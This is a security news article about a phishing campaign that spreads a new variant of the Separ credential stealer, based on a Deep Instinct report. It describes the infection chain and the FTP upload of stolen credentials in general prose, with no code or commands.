Separ malware phishing campaign targets businesses

Researchers at Deep Instinct have released a report on a phishing campaign that is proving to be incredibly successful. The phishing campaign is targeting the credentials of businesses via a new variant of the Separ malware. Separ has been in use since at least the year 2017, and additionally, the malware is based on credential stealing malware that dates back as far as 2013.

The report describes Separ and its attack tactics as follows:

The credential stealer Separ is unique, as it uses a combination of very short script or batch files, and legitimate executables, to carry out all of its malicious business logic. Therefore, Separ is an excellent example of the advanced and evasive attack technique commonly termed as “Living Off the Land.” In addition, Separ masquerades as a fake Adobe related program, using a fake PDF document as the initial infection vector, and malicious scripts and executable files named to resemble Adobe related programs.

This particular chain of phishing email attacks is focusing in particular on “hundreds of companies” found in Southeast Asia and the Middle East (though there are some companies being targeted in North America). The phishing emails goad users into downloading the PDF which launches a self-extractor. This self-extractor then calls wscript.exe to run the Visual Basic script called adobel.vbs.

Following the collection of credentials, they are uploaded via the FTP client ancp.exe to freehostia.com (which according to Deep Instinct is a legitimate and noncriminal hosting service). Something to note here is that researchers were able to uncover that “no attempt has been made by the attacker to evade analysis.” One reason for this is that, according to Deep Instinct, “the use of scripts and legitimate binaries, in a ‘Living off the Land’ scenario, means the Separ attacker successfully evades detection.”

Additionally, it does not seem to matter to the threat actor in this scenario if people know their identity (a brash display of arrogance). Arrogance can be their downfall when the authorities catch up. Nobody in this day and age is untouchable as cybersecurity experts are getting better and better at anticipating criminal activity.

Featured image: Wikimedia

Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.

Share
Published by
Derek Kortepeter
Tags phishing

Recent Posts

Exchange Server log files growth and inadequate disk space allocation

When it comes to Exchange, if you build it, it will grow. Exchange Server log file growth can fill up…

3 hours ago

Hold the phone! Voice communication is becoming cool again

Business telephone conversations have largely been supplanted by email. But voice communication is far from dead — and it may…

6 hours ago

What are the potential disadvantages of SSL/TLS?

There’s wide consensus on the benefits of SSL/TLS. However, not as much attention has been given to SSL/TLS disadvantages.

3 days ago

Exploring native software inventory logging in Windows Server

Windows Server has built-software inventory logging that can be very useful. Here’s how to use this little-known feature.

3 days ago

Passwordless authentication: Safer, better, and about time

Passwordless authentication has quickly become one of the primary means by which users access their laptops, phones, and tablets because…

3 days ago

Automated Incident Response in Office 365 ATP simplifies cybersecurity

Microsoft has pumped up Office 365 Advanced Threat Protection with a new feature, Automated Incident Response. Here’s what you need…

4 days ago